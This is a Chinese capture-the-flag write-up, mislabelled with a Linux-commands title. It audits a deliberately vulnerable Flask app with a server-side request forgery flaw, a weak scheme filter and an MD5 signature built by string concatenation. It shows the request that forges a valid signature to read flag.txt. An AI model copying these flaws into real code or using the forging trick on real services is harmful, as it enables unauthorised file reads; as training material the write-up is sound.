Linux基礎命令(二)
阿新 • • 發佈:2020-07-30
#! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencoding('latin1') app = Flask(__name__) secert_key = os.urandom(16) class Task: def __init__(self, action, param, sign, ip): self.action = action self.param = param self.sign = sign self.sandbox = md5(ip) if(not os.path.xists(self.sandbox)): #SandBox For Remote_Addr os.mkdir(self.sandbox) def Exec(self): result = {} result['code'] = 500 if (self.checkSign()): if "scan" in self.action: tmpfile = open("./%s/result.txt" % self.sandbox, 'w') resp = scan(self.param) if (resp == "Connection Timeout"): result['data'] = resp else: print resp tmpfile.write(resp) tmpfile.close() result['code'] = 200 if "read" in self.action: f = open("./%s/result.txt" % self.sandbox, 'r') result['code'] = 200 result['data'] = f.read() if result['code'] == 500: result['data'] = "Action Error" else: result['code'] = 500 result['msg'] = "Sign Error" return result def checkSign(self): if (getSign(self.action, self.param) == self.sign): return True else: return False #generate Sign For Action Scan. @app.route("/geneSign", methods=['GET', 'POST']) def geneSign(): param = urllib.unquote(request.args.get("param", "")) #urllib.unquote 是url解碼 ----urlib.urlencode 是url編碼 #request.args.get獲取單個值 action = "scan" return getSign(action, param) @app.route('/De1ta',methods=['GET','POST']) def challenge(): action = urllib.unquote(request.cookies.get("action")) param = urllib.unquote(request.args.get("param", "")) sign = urllib.unquote(request.cookies.get("sign")) ip = request.remote_addr #獲取request的ip if(waf(param)): return "No Hacker!!!!" task = Task(action, param, sign, ip) return json.dumps(task.Exec()) @app.route('/') def index(): return open("code.txt","r").read() def scan(param): socket.setdefaulttimeout(1) try: return urllib.urlopen(param).read()[:50] except: return "Connection Timeout" def getSign(action, param): return hashlib.md5(secert_key + param + action).hexdigest() def md5(content): return hashlib.md5(content).hexdigest() def waf(param): check=param.strip().lower() if check.startswith("gopher") or check.startswith("file"): return True else: return False if __name__ == '__main__': app.debug = False app.run(host='0.0.0.0')
# generate Sign For Action Scan. @app.route("/geneSign", methods=['GET', 'POST']) def geneSign(): # urllib.unquote 是url解碼 ----urlib.urlencode 是url編碼 #request.args.get獲取單個值 param = urllib.unquote(request.args.get("param", "")) action = "scan" return getSign(action, param)
返回geneSign頁面
def getSign(action, param):
return hashlib.md5(secert_key + param + action).hexdigest()
看下De1ta頁面,接受了action和sign的cookie和param變數的值
@app.route('/De1ta', methods=['GET', 'POST']) def challenge(): action = urllib.unquote(request.cookies.get("action")) param = urllib.unquote(request.args.get("param", "")) sign = urllib.unquote(request.cookies.get("sign")) ip = request.remote_addr # 獲取request的ip if (waf(param)): return "No Hacker!!!!" task = Task(action, param, sign, ip) return json.dumps(task.Exec())
param要過waf,看一下waf。
移除頭尾空格,轉為小寫,檢查是否存在gopher和file,過濾了這兩個協議,不能直接通過param傳參來讀檔案
def waf(param):
check = param.strip().lower()
if check.startswith("gopher") or check.startswith("file"):
return True
else:
return False
過waf後,呼叫exec方法
def Exec(self):
result = {}
result['code'] = 500
if (self.checkSign()):
if "scan" in self.action:
tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
resp = scan(self.param)
if (resp == "Connection Timeout"):
result['data'] = resp
else:
print resp
tmpfile.write(resp)
tmpfile.close()
result['code'] = 200
if "read" in self.action:
f = open("./%s/result.txt" % self.sandbox, 'r')
result['code'] = 200
result['data'] = f.read()
if result['code'] == 500:
result['data'] = "Action Error"
else:
result['code'] = 500
result['msg'] = "Sign Error"
return result
先通過checkSign.
需要action和param通過getSign方法後的值與sign相同,如果scan再action裡面,會將param傳入scan函式呼叫
def checkSign(self):
if (getSign(self.action, self.param) == self.sign):
return True
else:
return False
看一下scan
def scan(param):
socket.setdefaulttimeout(1)
try:
return urllib.urlopen(param).read()[:50]
except:
return "Connection Timeout"
scan函式會抓取param這個頁面並讀取
再往後看,如果有read就可以進行讀取,並返回結果
這裡應該就是利用點了,題目一開始提醒了,flag在/flag.txt,我們就可以將param的值變為flag.txt,首先要考慮checkSign,要使
需要構造aciton和param經過md5加密後等於sign
def getSign(action, param):
return hashlib.md5(secert_key + param + action).hexdigest()
secret_key的值不知道,沒辦法手工構造,在geneSign頁面
# generate Sign For Action Scan.
@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
# urllib.unquote 是url解碼 ----urlib.urlencode 是url編碼 #request.args.get獲取單個值
param = urllib.unquote(request.args.get("param", ""))
action = "scan"
return getSign(action, param)
這裡呼叫了getSign,並且返回了他的值
action被寫為scan,少一個read,在exc方法中action必須有read和scan,
然後hint又告訴我們在./flag.txt下
所以構造
http://ca643316-afc2-4476-afd0-5263a319e2c6.node3.buuoj.cn/geneSign?param=flag.txtread
獲得cookie後
a918564b3ef3310d56199a0039bf5b60
訪問Delta頁面,傳參param=flag.txt
程式碼審計類的題目總體上講沒有什麼特別的套路,尤其是這種體量較小的程式碼,也不需要很大的腦洞,只要有較為紮實的基本功,認真的審計程式碼,找出關鍵點,耐心回溯與跟進,搞清楚流程,構建一個大體的思路,去實踐去驗證它的可行性,即使沒有接觸題目,也一定有所提升。